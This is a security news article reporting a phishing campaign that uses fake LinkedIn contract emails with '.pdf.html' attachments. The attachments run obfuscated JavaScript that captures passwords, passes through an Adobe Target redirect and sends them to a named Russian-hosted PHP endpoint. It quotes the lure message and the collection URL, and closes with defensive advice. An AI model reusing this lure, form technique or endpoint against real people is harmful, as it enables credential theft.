Contact us
Contact us

News

About

Home Crypto News Adobe Target redirect used to steal LinkedIn passwords

Adobe Target redirect used to steal LinkedIn passwords

Author Whitewallet Research
Posted: 27 May 2026, 10:31 CET 2 min read

Phishing emails with a fake LinkedIn contract use an Adobe Target redirect to capture passwords, send them to a Russian server and then route victims to LinkedIn.

Cybercriminals sent phishing emails that included a fake LinkedIn contract attachment and used an Adobe Target redirect to harvest passwords, forward them to a Russian server and then send victims to the real LinkedIn site.

The messages were presented as business inquiries and carried an attachment labeled as a PDF but saved with a double extension such as “.pdf.html”. Email details often did not match: sender name, address and signature were inconsistent; the named company existed but not in the sender’s country; and the named individual did not appear to work at the claimed company. One sample message read: “I would like to do business with you via LinkedIn. I’m a buyer. Please find attached the signed contract No. #33110:12000pcs. I look forward to hearing from you.”

The attachment was an HTML file that executed a heavily obfuscated JavaScript payload. The script used URL encoding and two Base64-encoded sections and produced a simple login form. The form displayed a hardcoded recipient email address that users could not edit.

Network analysis showed the script routing victims through an Adobe Target delivery URL: https://lnkd.tt.omtrdc.net/rest/v1/delivery. Researchers determined the Adobe Target endpoint served as a redirect and tracking point rather than as the credential receiver. After deobfuscation, the form submitted credentials by HTTP POST to a PHP script on a Russian-hosted server at http://a1263367.xsph.ru/taam/Ln.php. The POST included a parameter carrying the hardcoded email address and another carrying the password entered by the victim. The PHP handler then redirected the user to business.linkedin.com.

Security tools detected the campaign and Malwarebytes’ Scam Guard flagged the malicious message. Recommended precautions include accessing accounts through official apps or by typing the site address directly, checking file extensions before opening attachments, enabling multi-factor authentication on important accounts and running up-to-date anti-malware with web protection. Tools that flag suspicious emails and attachments can help block messages before users interact with them.

Whitewallet Research
Author

Articles by this author

What is a crypto seed phrase
What is a crypto seed phrase
1 day ago
Seed phrase vs private key
Seed phrase vs private key
6 days ago
Global South trails in generative AI, Microsoft finds
Global South trails in generative AI, Microsoft finds
6 days ago
Anthropic lets Glasswing partners publish Mythos-found flaws
Anthropic lets Glasswing partners publish Mythos-found flaws
may 19
Iran launches Bitcoin-settled insurance for Hormuz shipping
Iran launches Bitcoin-settled insurance for Hormuz shipping
may 18

Latest News

MORE
OpenZeppelin co-founder warns AI agents make all DeFi unsafe

OpenZeppelin co-founder warns AI agents make all DeFi unsafe

37 minutes ago 2 min read
Bankless Cofounder Sells All ETH, Still Bullish on Ethereum

Bankless Cofounder Sells All ETH, Still Bullish on Ethereum

4 hours ago 2 min read
Trump backs CFTC control of prediction markets, slams four

Trump backs CFTC control of prediction markets, slams four

5 hours ago 2 min read
Dudley: Fed credibility at risk as Warsh faces inflation

Dudley: Fed credibility at risk as Warsh faces inflation

13 hours ago 2 min read
MORE